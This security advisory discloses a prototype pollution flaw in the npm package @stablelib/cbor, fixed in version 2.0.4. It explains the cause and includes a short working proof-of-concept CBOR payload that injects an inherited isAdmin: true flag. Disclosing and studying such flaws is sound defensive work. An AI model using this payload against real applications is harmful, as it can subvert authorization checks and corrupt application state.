PT-2026-32616 — Prototype Pollution in Npm @Stablelib/Cbor

PT-2026-32616 · Npm · @Stablelib/Cbor

Published

2026-04-04

Updated

2026-04-04

CVSS v4.0

8.9

High

Vector

AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N

Summary

@stablelib/cbor decodes CBOR maps into ordinary JavaScript objects and assigns attacker-controlled keys directly onto those objects. A CBOR map key named proto therefore changes the prototype of the decoded object instead of becoming an ordinary data property.

Details

The decoder builds map results with a plain {} and then stores attacker-controlled keys using bracket assignment.

That is unsafe for special property names. In JavaScript, assigning to obj[" proto "] on a normal object does not create a plain own property. It invokes the built-in proto setter and replaces the object’s prototype if the supplied value is an object or null.

As a result, a CBOR payload containing a map entry like:

key: " proto "
value: { isAdmin: true }

does not decode to an object with an own property called proto. It decodes to an object whose prototype is now attacker-controlled. Any code that later reads properties through normal lookup will see inherited attacker-supplied values.

PoC

import { decode } from "@stablelib/cbor";

// CBOR:
// {
//  " proto ": { "isAdmin": true }
// }
//
// a1          map(1)
//  69         text(9)
//   " proto "
//  a1         map(1)
//   67        text(7)
//    "isAdmin"
//   f5        true

const payload = new Uint8Array([
 0xa1,
 0x69, 0x5f, 0x5f, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x5f, 0x5f,
 0xa1,
 0x67, 0x69, 0x73, 0x41, 0x64, 0x6d, 0x69, 0x6e,
 0xf5
]);

const obj = decode(payload);

console.log(Object.hasOwn(obj, "isAdmin")); // false
console.log(obj.isAdmin);          // true
console.log(Object.getPrototypeOf(obj).isAdmin); // true

Impact

Any application that decodes untrusted CBOR into JavaScript objects can receive objects with attacker-controlled prototypes.

In practice, that can corrupt configuration objects, influence authorization checks, alter feature flags, and break application logic that relies on normal property lookup instead of strict own-property checks. If the decoded object is later merged into other objects, the impact can spread further.

Solution

Upgrade to version 2.0.4.

Fix

Prototype Pollution

Found an issue in the description? Have something to add? Feel free to write us 👾

dbugs@ptsecurity.com

Weakness Enumeration

CWE-1321

Related Identifiers

GHSA-W48F-FWG7-WW6P

Affected Products

@Stablelib/Cbor